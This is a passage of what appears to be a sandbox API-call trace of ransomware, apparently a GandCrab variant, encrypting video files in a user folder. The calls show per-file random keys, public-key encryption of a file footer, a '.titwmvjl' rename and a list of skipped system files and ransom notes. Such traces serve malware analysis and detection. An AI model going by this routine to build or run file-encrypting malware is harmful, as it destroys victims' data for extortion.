lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.752] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.752] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.753] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.753] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.753] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.753] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.753] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.753] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.754] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.754] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.754] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.754] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.754] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.754] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.754] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.755] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503978) returned 1 [0095.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.755] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.755] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.755] GetLastError () returned 0x0 [0095.755] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.756] CryptDestroyKey (hKey=0x503978) returned 1 [0095.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.756] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.756] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.756] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503838) returned 1 [0095.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.757] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.757] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.757] GetLastError () returned 0x0 [0095.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.757] CryptDestroyKey (hKey=0x503838) returned 1 [0095.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.757] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.758] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x3c49, lpOverlapped=0x0) returned 1 [0095.768] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffc3b7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.768] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3c49, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x3c49, lpOverlapped=0x0) returned 1 [0095.769] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.769] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.770] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.774] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.774] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.774] CloseHandle (hObject=0x2d4) returned 1 [0095.775] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\rhtdv.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\rHtdv.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\rhtdv.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.775] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.775] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.775] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.776] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.776] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt" [0095.776] lstrlenW (lpString=".titwmvjl") returned 9 [0095.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt") returned 121 [0095.776] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.776] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 130 [0095.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt") returned 121 [0095.776] lstrlenW (lpString=".txt") returned 4 [0095.776] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.776] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.776] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.776] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt") returned 121 [0095.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\TITWMVJL-DECRYPT.txt") returned 121 [0095.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.777] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.777] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.777] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.777] lstrcmpW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2=".") returned 1 [0095.777] lstrcmpW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="..") returned 1 [0095.777] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="UjvYO54xgHAwG5p6N.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv" [0095.777] lstrlenW (lpString=".titwmvjl") returned 9 [0095.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned 122 [0095.777] VirtualAlloc (lpAddress=0x0, dwSize=0x134, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.777] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv.titwmvjl") returned 131 [0095.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned 122 [0095.777] lstrlenW (lpString=".mkv") returned 4 [0095.777] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.777] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0095.777] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0095.777] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned 122 [0095.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned 122 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="desktop.ini") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="autorun.inf") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="ntuser.dat") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="iconcache.db") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="bootsect.bak") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="boot.ini") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="ntuser.dat.log") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="thumbs.db") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="ntldr") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="NTDETECT.COM") returned 1 [0095.778] lstrcmpiW (lpString1="UjvYO54xgHAwG5p6N.mkv", lpString2="Bootfont.bin") returned 1 [0095.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv") returned 122 [0095.778] lstrlenW (lpString=".mkv") returned 4 [0095.778] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.778] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0095.778] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.778] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.779] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\ujvyo54xghawg5p6n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.779] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.779] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.780] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.780] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.780] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.780] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.780] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.780] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.781] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.781] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.781] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.781] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.782] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.782] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.782] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.782] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.782] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.782] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.782] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.783] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0095.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.783] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.783] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.783] GetLastError () returned 0x0 [0095.783] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.784] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.784] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.784] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.784] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0095.784] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.784] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.785] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.785] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.785] GetLastError () returned 0x0 [0095.785] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.785] CryptDestroyKey (hKey=0x503578) returned 1 [0095.785] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.785] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.785] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.785] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.786] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x18fcb, lpOverlapped=0x0) returned 1 [0095.798] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffe7035, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.798] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18fcb, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x18fcb, lpOverlapped=0x0) returned 1 [0095.799] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.799] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.802] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.806] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.806] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.806] CloseHandle (hObject=0x2d4) returned 1 [0095.807] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\ujvyo54xghawg5p6n.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\UjvYO54xgHAwG5p6N.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\ujvyo54xghawg5p6n.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0095.808] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.808] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.808] lstrcmpW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2=".") returned 1 [0095.808] lstrcmpW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="..") returned 1 [0095.808] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="yZ6Zvf__RXgl8iu3.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4" [0095.808] lstrlenW (lpString=".titwmvjl") returned 9 [0095.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned 